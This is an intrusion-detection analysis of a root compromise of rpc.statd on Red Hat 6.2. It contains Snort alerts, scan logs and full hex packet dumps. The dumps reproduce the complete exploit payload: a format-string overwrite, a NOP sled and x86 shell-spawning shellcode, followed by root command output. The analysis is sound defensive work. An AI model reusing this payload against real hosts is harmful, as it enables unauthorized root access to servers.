Analysis performed by Wes Bateman of the Manisec Corporation (http://www.manisec.com) Detect 2: Successful compromise of rpc.statd on a default RedHat 6.2 installation Mar 5 04:25:47 MV/IDS10/portmap-request-rstatd: 148.243.136.7:837 -> test.network.70.133:111 Mar 5 04:25:47 MV/IDS362/shellcode-x86-nops-udp: 148.243.136.7:838 -> test.network.70.133:610 Mar 5 04:25:49 MV/IDS362/shellcode-x86-nops-udp: 148.243.136.7:838 -> test.network.70.133:610 Mar 5 04:25:51 MV/IDS362/shellcode-x86-nops-udp: 148.243.136.7:838 -> test.network.70.133:610 Mar 5 04:34:13 MISC - MISC - id check returned root: test.network.70.133:39168 -> 148.243.136.7:3909 Detect 2 - Packet Dumps 03/05-04:25:47.266244 0:3:A0:D3:FC:38 -> 0:3:E3:61:29:50 type:0x800 len:0x62 148.243.136.7:837 -> test.network.70.133:111 UDP TTL:56 TOS:0x0 ID:22522 IpLen:20 DgmLen:84 Len: 64 71 2C 9F A5 00 00 00 00 00 00 00 02 00 01 86 A0 q,.............. 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................ 00 00 00 11 00 00 00 00 ........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/05-04:25:47.361124 0:3:A0:D3:FC:38 -> 0:3:E3:61:29:50 type:0x800 len:0x45E 148.243.136.7:838 -> test.network.70.133:610 UDP TTL:56 TOS:0x0 ID:22523 IpLen:20 DgmLen:1104 Len: 1084 7A C8 14 62 00 00 00 00 00 00 00 02 00 01 86 B8 z..b............ 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ............... 3A A3 6A 31 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :.j1....localhos 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t............... 00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................ 18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................ 1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x% 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8 78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1 33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x 25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n.............. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1. EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A... FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A. 99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A.. 66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?..... 3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin. 46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V 10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N............. FF FF FF 00 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/05-04:25:49.368302 0:3:A0:D3:FC:38 -> 0:3:E3:61:29:50 type:0x800 len:0x45E 148.243.136.7:838 -> test.network.70.133:610 UDP TTL:56 TOS:0x0 ID:23053 IpLen:20 DgmLen:1104 Len: 1084 7A C8 14 62 00 00 00 00 00 00 00 02 00 01 86 B8 z..b............ 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ............... 3A A3 6A 31 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :.j1....localhos 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t............... 00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................ 18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................ 1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x% 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8 78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1 33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x 25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n.............. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1. EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A... FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A. 99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A.. 66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?..... 3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin. 46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V 10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N............. FF FF FF 00 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/05-04:25:51.375070 0:3:A0:D3:FC:38 -> 0:3:E3:61:29:50 type:0x800 len:0x45E 148.243.136.7:838 -> test.network.70.133:610 UDP TTL:56 TOS:0x0 ID:23508 IpLen:20 DgmLen:1104 Len: 1084 7A C8 14 62 00 00 00 00 00 00 00 02 00 01 86 B8 z..b............ 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ............... 3A A3 6A 31 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :.j1....localhos 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t............... 00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................ 18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................ 1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x% 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8 78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1 33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x 25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n.............. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1. EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A... FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A. 99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A.. 66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?..... 3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin. 46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V 10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N............. FF FF FF 00 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/05-04:34:13.947820 0:3:E3:61:29:50 -> 0:30:71:2C:8:0 type:0x800 len:0xB0 test.network.70.133:39168 -> 148.243.136.7:3909 TCP TTL:63 TOS:0x0 ID:3651 IpLen:20 DgmLen:162 DF ***AP*** Seq: 0xC81E7E72 Ack: 0xC172737E Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 50002261 177275836 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 64 3D uid=0(root) gid= 30 28 72 6F 6F 74 29 0A 62 69 6E 0A 62 6F 6F 74 0(root).bin.boot 0A 64 65 76 0A 65 74 63 0A 68 6F 6D 65 0A 6C 69 .dev.etc.home.li 62 0A 6C 6F 73 74 2B 66 6F 75 6E 64 0A 6D 69 73 b.lost+found.mis 63 0A 6D 6E 74 0A 6F 70 74 0A 70 72 6F 63 0A 72 c.mnt.opt.proc.r 6F 6F 74 0A 73 62 69 6E 0A 74 66 74 70 62 6F 6F oot.sbin.tftpboo 74 0A 74 6D 70 0A 75 73 72 0A 76 61 72 0A t.tmp.usr.var. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Detect 2 - Scans from this attacking host (148.243.136.7) Mar 5 04:25:47 src@dfw1a-core/10.24.0.123 snort[27872]: MV/IDS10/portmap-request-rstatd: 148.243.136.7:837 -> test.network.70.133:111 Mar 5 04:25:47 src@dfw1a-core/10.24.0.123 snort[27872]: MV/IDS362/shellcode-x86-nops-udp: 148.243.136.7:838 -> test.network.70.133:610 Mar 5 04:25:49 src@dfw1a-core/10.24.0.123 snort[27872]: MV/IDS362/shellcode-x86-nops-udp: 148.243.136.7:838 -> test.network.70.133:610 Mar 5 04:25:51 src@dfw1a-core/10.24.0.123 snort[27872]: MV/IDS362/shellcode-x86-nops-udp: 148.243.136.7:838 -> test.network.70.133:610 Mar 5 04:34:13 src@dfw1a-core/10.24.0.123 snort[27872]: MISC - MISC - id check returned root: test.network.70.133:39168 -> 148.243.136.7:3909 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3168 -> mexicocity.network.32.5:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3170 -> mexicocity.network.32.7:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3169 -> mexicocity.network.32.6:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3171 -> mexicocity.network.32.8:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3174 -> mexicocity.network.32.11:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3186 -> mexicocity.network.32.23:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3187 -> mexicocity.network.32.24:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3188 -> mexicocity.network.32.25:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3189 -> mexicocity.network.32.26:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3190 -> mexicocity.network.32.27:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3191 -> mexicocity.network.32.28:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3192 -> mexicocity.network.32.29:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3195 -> mexicocity.network.32.32:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3195 -> mexicocity.network.32.32:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3196 -> mexicocity.network.32.33:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3199 -> mexicocity.network.32.36:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3201 -> mexicocity.network.32.38:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3202 -> mexicocity.network.32.39:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3203 -> mexicocity.network.32.40:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3208 -> mexicocity.network.32.45:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3209 -> mexicocity.network.32.46:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3217 -> mexicocity.network.32.54:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3219 -> mexicocity.network.32.56:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3221 -> mexicocity.network.32.58:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3226 -> mexicocity.network.32.63:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3227 -> mexicocity.network.32.64:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3228 -> mexicocity.network.32.65:111 Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3417 -> mexicocity.network.32.254:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4454 -> mexicocity.network.32.5:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4456 -> mexicocity.network.32.7:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4455 -> mexicocity.network.32.6:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4457 -> mexicocity.network.32.8:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4460 -> mexicocity.network.32.11:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4473 -> mexicocity.network.32.24:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4478 -> mexicocity.network.32.29:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4489 -> mexicocity.network.32.40:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4494 -> mexicocity.network.32.45:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4495 -> mexicocity.network.32.46:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4504 -> mexicocity.network.32.54:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4506 -> mexicocity.network.32.56:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4508 -> mexicocity.network.32.58:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4513 -> mexicocity.network.32.63:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4514 -> mexicocity.network.32.64:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4515 -> mexicocity.network.32.65:111 Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4799 -> mexicocity.network.32.254:111 Mar 6 00:54:52 ALID/111 TCP portmap Scan detected: 148.243.136.7:4460 -> mexicocity.network.32.11:111 Mar 6 00:54:52 ALID/111 TCP portmap Scan detected: 148.243.136.7:4475 -> mexicocity.network.32.26:111 Mar 6 00:54:52 ALID/111 TCP portmap Scan detected: 148.243.136.7:4476 -> mexicocity.network.32.27:111 Mar 6 00:54:52 ALID/111 TCP portmap Scan detected: 148.243.136.7:4477 -> mexicocity.network.32.28:111 Mar 6 00:54:52 ALID/111 TCP portmap Scan detected: 148.243.136.7:4482 -> mexicocity.network.32.33:111 Mar 6 00:54:52 ALID/111 TCP portmap Scan detected: 148.243.136.7:4472 -> mexicocity.network.32.23:111 Mar 6 00:54:52 ALID/111 TCP portmap Scan detected: 148.243.136.7:4474 -> mexicocity.network.32.25:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2320 -> tokyo.network.105.5:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2322 -> tokyo.network.105.7:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2326 -> tokyo.network.105.11:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2323 -> tokyo.network.105.8:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2358 -> tokyo.network.105.39:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2321 -> tokyo.network.105.6:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2346 -> tokyo.network.105.27:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2353 -> tokyo.network.105.34:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2347 -> tokyo.network.105.28:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2349 -> tokyo.network.105.30:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2375 -> tokyo.network.105.56:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2341 -> tokyo.network.105.23:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2344 -> tokyo.network.105.25:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2343 -> tokyo.network.105.24:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2348 -> tokyo.network.105.29:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2345 -> tokyo.network.105.26:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2383 -> tokyo.network.105.64:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2373 -> tokyo.network.105.54:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2377 -> tokyo.network.105.58:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2382 -> tokyo.network.105.63:111 Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2384 -> tokyo.network.105.65:111 Mar 11 22:17:26 ALID/111 TCP portmap Scan detected: 148.243.136.7:1559 -> tokyo.network2.242.134:111 Mar 11 22:17:26 ALID/111 TCP portmap Scan detected: 148.243.136.7:1575 -> tokyo.network2.242.150:111 Mar 11 22:17:26 ALID/111 TCP portmap Scan detected: 148.243.136.7:1564 -> tokyo.network2.242.139:111 Mar 11 22:17:26 ALID/111 TCP portmap Scan detected: 148.243.136.7:1570 -> tokyo.network2.242.145:111 Mar 11 22:17:26 ALID/111 TCP portmap Scan detected: 148.243.136.7:1586 -> tokyo.network2.242.161:111 Mar 12 05:46:25 ALID/111 TCP portmap Scan detected: 148.243.136.7:2969 -> tokyo.network2.242.147:111 Mar 12 05:46:25 ALID/111 TCP portmap Scan detected: 148.243.136.7:3003 -> tokyo.network2.242.181:111 Mar 12 05:46:25 ALID/111 TCP portmap Scan detected: 148.243.136.7:3064 -> tokyo.network2.242.242:111 Mar 12 05:46:25 ALID/111 TCP portmap Scan detected: 148.243.136.7:2960 -> tokyo.network2.242.138:111 ####################################################################### ### Detect was generated by: Linux sensor running Snort 1.6.3 with a combination of whitehats, snort.org, and customized rulesets. The rules that were triggered: alert UDP $EXTERNAL any -> $INTERNAL 111 (msg: "MV/IDS10/portmap-request-rstatd"; content: "|01 86 A0 00 00|";) alert UDP $EXTERNAL any -> $INTERNAL any 